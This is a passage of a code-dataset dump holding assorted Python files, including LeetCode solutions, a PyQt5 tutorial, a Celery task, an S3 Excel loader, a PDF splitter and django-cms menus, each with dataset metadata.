)\n\n\tcgiEnv.OutCgiRdf()\n\nif __name__ == '__main__':\n\tMain()\n","sub_path":"survol/sources_types/CIM_ComputerSystem/wmi_hostname_processes.py","file_name":"wmi_hostname_processes.py","file_ext":"py","file_size_in_byte":6406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"274742736","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n # if target is even\n res = [-1,-1]\n if (target % 2) == 0:\n count = 0\n target_half = target / 2\n for index,val in enumerate(nums):\n if val == target_half:\n res[count] = index\n count += 1\n if count >= 2:\n return res\n\n # dedup\n nums0 = list(set(nums))\n if len(nums0) < 2:\n return [0,1]\n\n nums0 = [target - val for index,val in enumerate(nums0)] + [val for index,val in enumerate(nums0)]\n nums0 = sorted(nums0, reverse=False)\n\n first = 0\n prev = nums0[0]\n for i in range(1, len(nums0)):\n current = nums0[i]\n if current == prev:\n first = current\n break\n prev = current\n second = target - first\n count = 0\n for index,val in enumerate(nums):\n if second == val or first == val:\n res[count] = index\n count += 1\n if count >= 2:\n return res\n return res","sub_path":"py/P0001.py","file_name":"P0001.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"475893655","text":"from PyQt5 import QtCore\nfrom feeds import update_feed\n\n\nclass Updater(QtCore.QThread):\n def __init__(self, feeds_urls=[]):\n QtCore.QThread.__init__(self)\n self.feeds_urls = feeds_urls\n self.feed_data = dict()\n\n def run(self):\n for url_to_feed in self.feeds_urls:\n title, new_data = update_feed(url_to_feed)\n\n if new_data is not None:\n self.feed_data[title] = new_data\n","sub_path":"updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"49049399","text":"class Solution(object):\n def totalNQueens(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n result = []\n if n == 0:\n return 0\n matrix = [\".\" * n] * n\n row = 0\n self.arrangeQueens(result, row, matrix)\n return len(result)\n\n\n def arrangeQueens(self, result, row, matrix):\n n = len(matrix)\n for col in range(n):\n matrix[row] = \".\" * col + \"Q\" + \".\" * (n - col - 1)\n if self.is_valid(matrix, row, col):\n if row == n - 1:\n # matrix keeps changing, so store a copy (matrix.copy()) in result\n result.append(matrix.copy())\n else:\n self.arrangeQueens(result, row+1, matrix)\n else:\n matrix[row] = \".\" * n\n\n\n def is_valid(self, matrix, row, col):\n # every row holds exactly one \"Q\", so the rows themselves need no check\n # check the same column in every previous row\n for i in range(row):\n if matrix[i][col] == \"Q\":\n return False\n\n # check the main diagonal; only the upper part matters, the lower part has no queens yet\n i = row - 1\n j = col - 1\n while i >= 0 and j >= 0:\n if matrix[i][j] == \"Q\":\n return False\n i -= 1\n j -= 1\n\n # check the anti-diagonal, again only the upper part\n i = row - 1\n j = col + 1\n while i >= 0 and j <= len(matrix) - 1:\n if matrix[i][j] == \"Q\":\n return False\n i -= 1\n j += 1\n\n return True\n\nif __name__ == '__main__':\n solution = Solution()\n result = solution.totalNQueens(4)\n 
print(result)\n\n\n\n\n\n","sub_path":"leetcode/51-100/_51_solveQueens.py","file_name":"_51_solveQueens.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"97765286","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3350)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/trjg/code/venv/django-geo-db/lib/python3.5/site-packages/django_geo_db/management/commands/setup_map_types.py\n# Compiled at: 2018-03-10 10:16:54\n# Size of source mod 2**32: 421 bytes\nfrom django.core.management.base import BaseCommand\nfrom django_geo_db.models import LocationMapType\nTYPES = [\n 'simple']\n\nclass Command(BaseCommand):\n help = 'Adds default map types.'\n\n def handle(self, *args, **options):\n for t in TYPES:\n map_type, created = LocationMapType.objects.get_or_create(type=t)\n if created:\n print('Created: {0}'.format(str(map_type)))","sub_path":"pycfiles/django_geo_db-0.2.1.linux-x86_64.tar/setup_map_types.cpython-35.py","file_name":"setup_map_types.cpython-35.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"518981898","text":"\"\"\"Test module for the Malta parse_start_date processor.\"\"\"\n\nfrom pytest import mark\nimport datetime\nfrom common.processors.MT.parse_dates import parse_dates\n\ndate_examples = [\n ('2011', (2011, 1, 1)),\n ('Q2 2011', (2011, 4, 1)),\n ('Q 4 2011', (2011, 10, 1)),\n ('Quarter 3 2011', (2011, 7, 1)),\n ('Quarter2 2011', (2011, 4, 1)),\n ('Tuesday, October 18, 2011', (2011, 10, 18)),\n ('31/01/2011', (2011, 1, 31))\n]\n\n\n@mark.parametrize('raw_date, date_tuple', date_examples)\ndef test_parse_start_date_parses_correctly(raw_date, date_tuple):\n row = {'Start Date': raw_date}\n result = parse_dates(row, date_fields=['Start Date'])['Start Date']\n assert result == datetime.date(*date_tuple)\n","sub_path":"eu-structural-funds/tests/processors/MT/test_parse_dates.py","file_name":"test_parse_dates.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"619376568","text":"import torch\nimport torch.nn as nn\n\nclass BaseModel(nn.Module):\n\n def __init__(self):\n\n super().__init__()\n\n # Paramters\n\n # Loss Function\n self.loss_fn = nn.CrossEntropyLoss()\n\n def forward(self, batch):\n\n predictions = None\n\n loss = self.loss_fn(predictions, batch['targets'])\n\n return loss\n\n def save(self, **kwargs):\n params = dict()\n params['state_dict'] = {k:v.cpu() for k, v in self.state_dict().items()}\n\n for k,v in kwargs.items():\n params[k] = v\n\n torch.save(params, open('model.pt', 'wb'))\n\n @classmethod\n def load(cls, file_name):\n params = torch.load(file_name)\n\n model = cls()\n\n model.load_state_dict(params['state_dict'])\n\n return model\n","sub_path":"base/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"224197491","text":"'''\nTutorial 10 PyQT Font widget\n\nadd Font widget\nexcluded an issue about macOS can't change the font.\nPyQt5 upgrade to 12.1 or downgrade to 10.1\n'''\n\nimport sys\nfrom PyQt5.QtWidgets import QMessageBox, QPushButton, QProgressBar, QLabel, QComboBox, QSpacerItem, QFontDialog\nfrom PyQt5.QtWidgets import QStyleFactory, QLabel, QComboBox, QMainWindow, 
QSizePolicy, QRadioButton\nfrom PyQt5.QtWidgets import QWidget, QApplication, QAction, QHBoxLayout, QVBoxLayout\nfrom PyQt5.QtCore import QCoreApplication, Qt, QRect\nfrom PyQt5.QtGui import *\n\nclass Window(QMainWindow):\n\n def __init__(self, parent=None):\n\n super(Window, self).__init__(parent)\n self.setGeometry(100,100,500,300)\n self.setWindowTitle(\"PyQt Tutorial 10\")\n\n # instantiate FormWidget inside the MainWindow\n self.form_widget = FormWidget(self)\n\n self.setCentralWidget(self.form_widget)\n\n # set up the exit action\n extractAction = QAction(QIcon(\"exit.png\"), \" &Exit\", self)\n extractAction.setShortcut(\"Shift+Q\")\n extractAction.setStatusTip(\"Leave The Application\")\n extractAction.triggered.connect(self.close_application)\n\n # set up the font-selection action\n fontChoice = QAction(QIcon(\"typography.png\"), \" &Font Style\", self)\n fontChoice.setShortcut(\"Ctrl+F\")\n fontChoice.setStatusTip(\"Change Font Styles\")\n fontChoice.triggered.connect(self.fontChoice)\n # enable the statusBar\n self.statusBar()\n\n # add a toolBar to the main window\n self.toolBar_MainToolBar = self.addToolBar(\"MainToolBar\")\n\n # add the button to the toolBar\n self.toolBar_MainToolBar.addAction(extractAction)\n\n # separate ToolBar for changing the font style\n self.toolBar_Edit = self.addToolBar(\"Edit\")\n self.toolBar_Edit.addAction(fontChoice)\n\n self.Label_fontTest = QLabel('Change:\\n0123456789')\n self.toolBar_Edit.addWidget(self.Label_fontTest)\n\n # set up the Main Menu\n mainMenu = self.menuBar()\n\n # disable the native MenuBar\n mainMenu.setNativeMenuBar(False)\n fileMenu = mainMenu.addMenu(\" &File\")\n fileMenu.addAction(extractAction)\n\n # use a frameless window style\n self.setWindowFlags(Qt.FramelessWindowHint)\n # sub-window style: no window buttons but it keeps a title; comment out to compare the effect\n # self.setWindowFlags(Qt.SubWindow)\n\n # get the screen size through the desktop module\n desktop=QApplication.desktop()\n # get the displayable desktop geometry\n rect=desktop.availableGeometry()\n # resize the window to the displayable screen size\n self.setGeometry(rect)\n # show the window\n self.show()\n\n def fontChoice(self):\n font, valid = QFontDialog.getFont()\n print(font)\n if valid:\n self.Label_fontTest.setFont(font)\n\n def close_application(self):\n choice = QMessageBox.question(self, \"Extract!\",\n \"Are You Going to Leave Now?\",\n QMessageBox.Yes | QMessageBox.No)\n \"\"\"QMessageBox including\n question For asking a question during normal operations.\n information For reporting information about normal operations.\n warning For reporting non-critical errors.\n critical For reporting critical errors.\n \"\"\"\n if choice == QMessageBox.Yes:\n print(\"Function has been terminated.\")\n sys.exit()\n else:\n pass\n # do nothing\n\nclass FormWidget(QWidget):\n\n def __init__(self,parent):\n super(FormWidget, self).__init__(parent)\n # horizontal layouts\n self.Hlayout_1=QHBoxLayout()\n self.Hlayout_2=QHBoxLayout()\n self.Hlayout_3=QHBoxLayout()\n # vertical layouts\n self.Vlayout_1=QVBoxLayout()\n self.Vlayout_2=QVBoxLayout()\n self.Vlayout_3=QVBoxLayout()\n\n # instantiate the label and combo-box widgets\n self.styleLabel_1=QLabel('Set Style')\n self.styleComboBox=QComboBox()\n\n # add the available styles from QStyleFactory to the combo box\n self.styleComboBox.addItems(QStyleFactory.keys())\n\n # find the current window style\n index=self.styleComboBox.findText(\n QApplication.style().objectName(),\n Qt.MatchFixedString\n )\n\n # select the current window style\n self.styleComboBox.setCurrentIndex(index)\n\n # choose the window style through the combo box\n self.styleComboBox.activated[str].connect(self.handlestyleChanged)\n\n self.progress = QProgressBar(self)\n self.progress.setGeometry(0,0,10,10)\n\n # QRadioButton\n self.styleLabel_2=QLabel('Set Style')\n # self.styleLabel_2.setAlignment(Qt.AlignCenter)\n\n self.macintosh = QRadioButton(self)\n self.macintosh.setObjectName(\"macintosh\")\n self.macintosh.setText(\"macintosh\")\n self.windows = QRadioButton(self)\n self.windows.setObjectName(\"windows\")\n self.windows.setText(\"windows\")\n self.fusion = QRadioButton(self)\n self.fusion.setObjectName(\"fusion\")\n self.fusion.setText(\"fusion\")\n\n\n\n # set up the font-selection button\n self.btn_fontChoice = QPushButton(QIcon(\"typography.png\"), \"Font Style\", self)\n self.btn_fontChoice.setShortcut(\"Ctrl+F\")\n self.btn_fontChoice.clicked.connect(self.fontChoice)\n\n # Add a button shortcut\n self.btn_download = QPushButton(\"Download\",self)\n self.btn_download.setShortcut(\"Meta+D\")\n # self.btn_download.resize(200,60)\n # self.btn_download.move(150,135)\n self.btn_download.clicked.connect(self.download)\n\n # spacer item for the layout\n spacerItem1 = QSpacerItem(0, 0,QSizePolicy.Expanding, QSizePolicy.Expanding)\n #QSizePolicy\n # - Fixed\n # - Minimum\n # - Maximum\n # - Preferred\n # - MinimumExpanding\n # - Expanding\n # - Ignored\n\n\n # start adding the widgets to the main window and set up the window layout\n # give the window a horizontal layout\n self.setLayout(self.Hlayout_1)\n\n # split Hlayout_1 into three parts\n self.Hlayout_1.addLayout(self.Vlayout_1)\n self.Hlayout_1.addLayout(self.Vlayout_2)\n self.Hlayout_1.addLayout(self.Vlayout_3)\n\n # add the QRadioButtons to the leftmost Vlayout_1\n self.Vlayout_1.addWidget(self.styleLabel_2)\n self.Vlayout_1.addWidget(self.macintosh)\n self.Vlayout_1.addWidget(self.windows)\n self.Vlayout_1.addWidget(self.fusion)\n # add the spacerItem to the leftmost Vlayout_1\n self.Vlayout_1.addItem(spacerItem1)\n self.Vlayout_1.addWidget(self.btn_fontChoice)\n\n # add two horizontal layouts and one spacerItem to the middle Vlayout_2\n self.Vlayout_2.addLayout(self.Hlayout_2)\n self.Vlayout_2.addLayout(self.Hlayout_3)\n self.Vlayout_2.addItem(spacerItem1)\n\n # add the text label on the left of Hlayout_2, at the top of the middle Vlayout_2\n self.Hlayout_2.addWidget(self.styleLabel_1)\n # add the ComboBox on the right of Hlayout_2, at the top of the middle Vlayout_2\n self.Hlayout_2.addWidget(self.styleComboBox)\n\n # add the progressBar on the left of Hlayout_3, at the bottom of the middle Vlayout_2\n self.Hlayout_3.addWidget(self.progress)\n # add the download button on the right of Hlayout_3, at the bottom of the middle Vlayout_2\n self.Hlayout_3.addWidget(self.btn_download)\n\n # add the spacerItem to the rightmost Vlayout_3\n self.Vlayout_3.addItem(spacerItem1)\n\n def fontChoice(self):\n font, valid = QFontDialog.getFont()\n if valid:\n self.styleLabel_1.setFont(font)\n self.styleLabel_2.setFont(font)\n self.styleComboBox.setFont(font)\n\n # change the window style\n def handlestyleChanged(self,style):\n QApplication.setStyle(style)\n print(QApplication.style().objectName(),\n Qt.MatchFixedString)\n\n def download(self):\n self.completed = 0\n while self.completed < 100:\n self.completed += 0.1\n self.progress.setValue(self.completed)\n\n def downloadCompleted(self):\n completedNotice = QMessageBox.information(self, \"completed\", \"Completed!\")\n\napp = QApplication([])\nfoo = Window()\nfoo.show()\nsys.exit(app.exec_())\n","sub_path":"Coding/System/Sentdex/PyQt/10.Font_Widget/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"125531524","text":"from celery import Celery\nimport time\nfrom kombu import Queue, Exchange\n\nfrom celery.utils.log import get_task_logger\nlogger = get_task_logger(__name__)\n\napp = Celery()\n# Load from config file\napp.config_from_object('celeryconfig')\n\napp.conf.task_queues = (\n Queue('scanned_log', exchange=Exchange('ScanTask', type='direct'),\n routing_key='task.log.scan'),\n)\n\napp.conf.beat_schedule = {\n 'scan-every-600-seconds': {\n 'task': 'tasks.log_scan',\n 'schedule': 20.0,\n 'args': (10, 16),\n 'options': {'queue': 'scanned_log',\n 'exchange': 'ScanTask', 'routing_key': 
'task.log.scan'}\n },\n}\n\n\n@app.task()\ndef log_scan(*args, **kwargs):\n logger.info(\"log_scan is running\")\n time.sleep(3)\n\n # do real scan staff...\n\n # call next log-sync service by send msg to Queue 'sync'.\n # from tasks import log_sync\n # log_sync.apply_async(arg=[], queue='sync', routing_key='synced')\n # or\n # call with task name string in case that task modules can not\n # be imported or on the other hosts.\n #app.send_task('tasks.handle_scan', exchange='ScanTask',\n # routing_key='task.log.scan')\n #\n app.send_task('tasks.handle_scan')\n return True\n\n\nif __name__ == \"__main__\":\n app.start()\n","sub_path":"python/celery/scan/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"110095618","text":"\"\"\"Menus for gstudio.plugins\"\"\"\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom menus.base import Modifier\nfrom menus.base import NavigationNode\nfrom menus.menu_pool import menu_pool\nfrom cms.menu_bases import CMSAttachMenu\n\nfrom gstudio.models import Objecttype\nfrom gstudio.models import Author\nfrom gstudio.models import Metatype\nfrom gstudio.managers import tags_published\nfrom gstudio.plugins.settings import HIDE_OBJECTTYPE_MENU\n\n\nclass ObjecttypeMenu(CMSAttachMenu):\n \"\"\"Menu for the objecttypes organized by archives dates\"\"\"\n name = _('Gstudio Objecttype Menu')\n\n def get_nodes(self, request):\n \"\"\"Return menu's node for objecttypes\"\"\"\n nodes = []\n archives = []\n attributes = {'hidden': HIDE_OBJECTTYPE_MENU}\n for objecttype in Objecttype.published.all():\n year = objecttype.creation_date.strftime('%Y')\n month = objecttype.creation_date.strftime('%m')\n month_text = objecttype.creation_date.strftime('%b')\n day = objecttype.creation_date.strftime('%d')\n\n key_archive_year = 'year-%s' % year\n key_archive_month = 'month-%s-%s' % (year, month)\n key_archive_day = 'day-%s-%s-%s' % (year, month, day)\n\n if not key_archive_year in archives:\n nodes.append(NavigationNode(\n year, reverse('gstudio_objecttype_archive_year', args=[year]),\n key_archive_year, attr=attributes))\n archives.append(key_archive_year)\n\n if not key_archive_month in archives:\n nodes.append(NavigationNode(\n month_text,\n reverse('gstudio_objecttype_archive_month', args=[year, month]),\n key_archive_month, key_archive_year,\n attr=attributes))\n archives.append(key_archive_month)\n\n if not key_archive_day in archives:\n nodes.append(NavigationNode(\n day, reverse('gstudio_objecttype_archive_day',\n args=[year, month, day]),\n key_archive_day, key_archive_month,\n attr=attributes))\n archives.append(key_archive_day)\n\n nodes.append(NavigationNode(objecttype.title, objecttype.get_absolute_url(),\n objecttype.pk, key_archive_day))\n return nodes\n\n\nclass MetatypeMenu(CMSAttachMenu):\n \"\"\"Menu for the metatypes\"\"\"\n name = _('Gstudio Metatype Menu')\n\n def get_nodes(self, request):\n \"\"\"Return menu's node for metatypes\"\"\"\n nodes = []\n nodes.append(NavigationNode(_('Metatypes'),\n reverse('gstudio_metatype_list'),\n 'metatypes'))\n for metatype in Metatype.objects.all():\n nodes.append(NavigationNode(metatype.title,\n metatype.get_absolute_url(),\n metatype.pk, 'metatypes'))\n return nodes\n\n\nclass AuthorMenu(CMSAttachMenu):\n \"\"\"Menu for the authors\"\"\"\n name = _('Gstudio Author Menu')\n\n def get_nodes(self, request):\n \"\"\"Return menu's node for 
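# --- The Celery record above chains services by task name. A minimal sketch of the
# receiving side plus the by-name dispatch it uses; the broker URL is a placeholder
# assumption, and note the commented-out apply_async call in the record should read
# args=[], not arg=[]:
from celery import Celery

app = Celery(broker='amqp://localhost')  # hypothetical broker

@app.task(name='tasks.handle_scan')
def handle_scan():
    return 'handled'

def hand_off():
    # by-name dispatch works even when the downstream tasks module cannot be imported here
    app.send_task('tasks.handle_scan', exchange='ScanTask', routing_key='task.log.scan')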
authors\"\"\"\n nodes = []\n nodes.append(NavigationNode(_('Authors'),\n reverse('gstudio_author_list'),\n 'authors'))\n for author in Author.published.all():\n nodes.append(NavigationNode(author.username,\n reverse('gstudio_author_detail',\n args=[author.username]),\n author.pk, 'authors'))\n return nodes\n\n\nclass TagMenu(CMSAttachMenu):\n \"\"\"Menu for the tags\"\"\"\n name = _('Gstudio Tag Menu')\n\n def get_nodes(self, request):\n \"\"\"Return menu's node for tags\"\"\"\n nodes = []\n nodes.append(NavigationNode(_('Tags'), reverse('gstudio_tag_list'),\n 'tags'))\n for tag in tags_published():\n nodes.append(NavigationNode(tag.name,\n reverse('gstudio_tag_detail',\n args=[tag.name]),\n tag.pk, 'tags'))\n return nodes\n\n\nclass ObjecttypeModifier(Modifier):\n \"\"\"Menu Modifier for objecttypes,\n hide the MenuObjecttype in navigation, not in breadcrumbs\"\"\"\n\n def modify(self, request, nodes, namespace, root_id, post_cut, breadcrumb):\n \"\"\"Modify nodes of a menu\"\"\"\n if breadcrumb:\n return nodes\n for node in nodes:\n if node.attr.get('hidden'):\n nodes.remove(node)\n return nodes\n\n\nmenu_pool.register_menu(ObjecttypeMenu)\nmenu_pool.register_menu(MetatypeMenu)\nmenu_pool.register_menu(AuthorMenu)\nmenu_pool.register_menu(TagMenu)\nmenu_pool.register_modifier(ObjecttypeModifier)\n","sub_path":"gstudio/plugins/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":5058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"350650926","text":"#Runtime 55ms, Beats 75.90%\n# Basic idea: Keep searching the max jump range we can get from the element in the current range, and keep track of jumps.\nclass Solution(object):\n def jump(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if nums==[] or len(nums)==1:\n return 0\n i,jump,cur,max_idx=0,1,nums[0],0\n while cur\nx\t#include \nd\t#include <string.h>\nx\t#include \n'''\n\nmain_code_template = '''\\\ndx\t\tchar a[] = \"$a\";\ndx\t\tchar b[] = \"$b\";\ndx\t\tchar s[10];\ndx\t\ndx\t\tstrcpy(s,a+$x0);\ndx\t\tprintf(\"%s\\\\n\",s);\ndx\t\ndx\t\tstrcpy(s+$x1,b);\ndx\t\tprintf(\"%s\\\\n\",s);\n'''\n\nargv_template = ''\n\nstdin_template = ''\n\nstdout_template = '''\\\n$y0\n$y1\n'''\n","sub_path":"cqg/templates/think_c/strings/strcpy_base.py","file_name":"strcpy_base.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"387027237","text":"import boto3\nimport os\nimport io\nimport sys\nimport openpyxl\nimport pandas as pd\nfrom tempfile import NamedTemporaryFile\n\nclass AutomateExcelLoad:\n\tdef __init__(self):\n\t\tself.s3_bucket = os.environ.get('MODEL_BUCKET', 'artifacts')\n\t\tself.s3_model_folder = os.environ.get('MODEL_FOLDER', 'models')\n\t\tself.s3_model_filename = os.environ.get('MODEL_FILENAME', 'filename.xlsx')\n\t\tself.s3_temp_folder = 'temp'\n\t\tself.s3_model_path = f's3://{self.s3_bucket}/{self.s3_model_folder}/{self.s3_model_filename}'\n\t\tself.s3_model_key = f'{self.s3_model_folder}/{self.s3_model_filename}'\n\t\tself.s3_temp_path = f's3://{self.s3_bucket}/temp/{self.s3_model_filename}'\n\t\tself.s3_temp_key = f'temp/{self.s3_model_filename}'\n\t\tself.query_filename = os.environ.get('QUERY_FILENAME', 'query.csv')\n\n\t\tself.region_name = os.environ.get('REGION_NAME', 'us-east-1')\n\t\tself.s3_resource = boto3.resource('s3', region_name=self.region_name)\n\t\tself.s3_client = boto3.client('s3', 
region_name=self.region_name)\n\n\t\tself.start_row = int(os.environ.get('START_ROW', '2'))\n\t\tself.start_column = int(os.environ.get('START_COLUMN', '1'))\n\t\tself.last_column = int(os.environ.get('LAST_COLUMN', '100'))\n\t\tself.data_name_sheet = os.environ.get('DATA_NAME_SHEET', 'DATA')\n\n\tdef get_df_from_csv(self):\n\t\tresponse = self.s3_resource \\\n\t\t\t\t\t.Bucket(self.s3_bucket) \\\n\t\t\t\t\t.Object(key='query-results/' + self.query_filename) \\\n\t\t\t\t\t.get()\n\t\tresult = pd.read_csv(io.BytesIO(response['Body'].read()), encoding='utf8')\n\t\treturn result\n\n\tdef save_file_on_bucket(self, wb):\n\t\tself.s3_client.put_object(Bucket=self.s3_bucket, Key=self.s3_temp_key)\n\n\t\twith NamedTemporaryFile() as tmp:\n\t\t\ttemp_file = f'tmp/tmp.xlsx'\n\t\t\twb.save(temp_file)\n\t\t\tself.s3_resource.Bucket(self.s3_bucket).upload_file(Filename=temp_file, Key=self.s3_temp_key)\n\n\t\tprint(f'Created temp file {self.s3_model_filename} in {self.s3_temp_path}\\n')\n\n\tdef load_data(self, wb):\n\t\tdf = self.get_df_from_csv()\n\n\t\tsheet_ranges = wb[self.data_name_sheet]\n\t\tlast_index = len(df.index) + 2\n\t\tlast_column = len(df.columns)\n\n\t\t# Limpa todas as células do modelo\n\t\tfor cell in range(self.start_row, 100):\n\t\t\tcolumn_count = 0\n\t\t\twhile column_count <= last_column:\n\t\t\t\tsheet_ranges.cell(row=cell, column=self.start_column+column_count).value = ''\n\t\t\t\tcolumn_count += 1\n\n\t\trow_count = 0\n\n\t\t# Carrega dados\n\t\tfor cell in range(self.start_row, last_index):\n\t\t\tcolumn_count = 0\n\t\t\twhile column_count < last_column:\n\t\t\t\tsheet_ranges.cell(row=cell, column=self.start_column+column_count).value = df.iloc[ row_count , column_count ]\n\t\t\t\tcolumn_count += 1\n\t\t\trow_count += 1\n\n\t\tpivot_sheet = wb['TD']\n\t\tpivot = pivot_sheet._pivots[0]\n\t\tpivot.cache.refreshOnLoad = True\n\n\t\tself.save_file_on_bucket(wb)\n\n\nif __name__ == \"__main__\":\n\tautomate_excel_load = AutomateExcelLoad()\n\n\tmodel_object = automate_excel_load.s3_resource.Bucket(automate_excel_load.s3_bucket).Object(key=automate_excel_load.s3_model_key).get()\n\tmodel_path = io.BytesIO(model_object['Body'].read())\n\tworkbook = openpyxl.load_workbook(model_path)\n\n\tautomate_excel_load.load_data(workbook)\n\tworkbook.close()","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"88168502","text":"def count_character(text, letter):\n result = 0\n for l in text:\n if l.upper() == letter.upper():\n result += 1\n\n return result\n\ndef count_all_characters(text):\n result = {}\n for letter in text:\n if letter.lower() not in result:\n result.update({letter.lower(): count_character(text, letter)})\n return result\n\n\nprint(count_all_characters('Mam dzisiaj dobry humor'))\n\n\"\"\" Zwróci\n{\n 'm': 3,\n 'a': 2,\n ' ': 3,\n 'd': 2,\n 'z': 1,\n 'i': 2,\n 's': 1,\n 'j': 1,\n 'o': 2,\n 'b': 1,\n 'r': 2, ---- Jakiś błąd się wkradł, dwa razy r\n 'y': 1,\n 'h': 1,\n 'u': 1,\n 'r': 1, ----\n}\n\"\"\"\n","sub_path":"exercise7.py","file_name":"exercise7.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"253353391","text":"def splithalfh(inputfilename):\n from PyPDF2 import PdfFileWriter, PdfFileReader, PdfFileMerger\n from tempfile import mkdtemp\n from os.path import join, isfile, splitext\n from os import listdir\n output = 
PdfFileWriter()\n input1 = PdfFileReader(open(inputfilename+\".pdf\", \"rb\"))\n count = 0\n numpg = input1.getNumPages()\n tempdir = mkdtemp()\n# codice per lo splitting\n# ricavo la pagina\n for i in range(0, numpg):\n pg = input1.getPage(i)\n # Prima Pagina (alto)\n pg.mediaBox.setLowerRight((595, 421))\n outputstream = open(tempdir + \"/\" + str(count)+\".pdf\", \"wb\")\n output.addPage(pg)\n output.write(outputstream)\n pg.mediaBox.setLowerRight((595, 0))\n outputstream.close()\n del output, outputstream\n count += 1\n # Reset Dell'output\n output = PdfFileWriter()\n # Seconda Pagina (Basso)\n pg.mediaBox.setUpperRight((595, 421))\n outputstream = open(tempdir + \"/\" + str(count)+\".pdf\", \"wb\")\n output.addPage(pg)\n output.write(outputstream)\n outputstream.close()\n pg.mediaBox.setUpperRight((595, 842))\n count += 1\n del output, outputstream\n # Reset Dell'output\n output = PdfFileWriter()\n\n# Giunzione delle pagine\n filelist = [splitext(file)[0] for file in listdir(tempdir) if isfile(join(tempdir, file))]\n filelist.sort(key=int)\n\n output = PdfFileMerger()\n for file in filelist:\n input = open(join(tempdir, file + \".pdf\"), \"rb\")\n output.append(input)\n\n os = open(inputfilename+\"_split.pdf\", \"wb\")\n output.write(os)\n os.close()\n","sub_path":"SlideSplitter/splithalfh.py","file_name":"splithalfh.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"612512163","text":"\"Test user API.\"\n\nimport http.client\n\nimport base\n\n\nclass User(base.Base):\n \"Test the user API endpoints.\"\n\n def test_data(self):\n \"Get user JSON.\"\n url = f\"{base.CONFIG['root_url']}/user/{base.CONFIG['username']}\"\n response = self.session.get(url)\n user = self.check_schema(response)\n\n\nif __name__ == '__main__':\n base.run()\n","sub_path":"test/test_user.py","file_name":"test_user.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"97415437","text":"import xml.etree.ElementTree as ET\n\n\ndef indent(elem, level=0):\n i = \"\\n\" + level*\" \"\n if len(elem):\n if not elem.text or not elem.text.strip():\n elem.text = i + \" \"\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n for elem in elem:\n indent(elem, level+1)\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n else:\n if level and (not elem.tail or not elem.tail.strip()):\n elem.tail = i\n\n\nintegrator_type = \"path\"\ninteger_name = \"maxDepth\"\ninteger_value = \"7\"\ntransform_vector = \"\"\nsampler_type = \"\"\nsamples = \"\"\ncamera_type = \"\"\ncamera_name = \"\"\ncamera_value = \"\"\nfilm_type = \"ldrfilm\"\nxres = \"\"\nyres = \"\"\n\nscene = ET.Element(\"scene\",version=\"0.5.0\" )\n\nintegrator = ET.SubElement(scene, \"integrator\", type = integrator_type)\n\nET.SubElement(integrator, \"integer\", name = integer_name, value = integer_value)\n\ntree = ET.ElementTree(scene)\nindent(scene)\ntree.write(\"filename.xml\", encoding=\"utf-8\",xml_declaration=True, method=\"xml\")\n\n\n","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"545306286","text":"import click\n\n@click.command()\n@click.option('--center', nargs=2, type=float,\n help='center of the circle')\n@click.option('--radius', type=float,\n help='radius of the circle')\ndef circle(center, 
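# --- The converter.py record above hand-rolls the recursive indent() helper that the
# standard library ships as xml.etree.ElementTree.indent() since Python 3.9. A minimal
# sketch of the same pipeline using the stdlib version (element names from the record):
import xml.etree.ElementTree as ET

scene = ET.Element('scene', version='0.5.0')
integrator = ET.SubElement(scene, 'integrator', type='path')
ET.SubElement(integrator, 'integer', name='maxDepth', value='7')

ET.indent(scene)  # stdlib equivalent of the record's indent(elem)
ET.ElementTree(scene).write('filename.xml', encoding='utf-8', xml_declaration=True)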
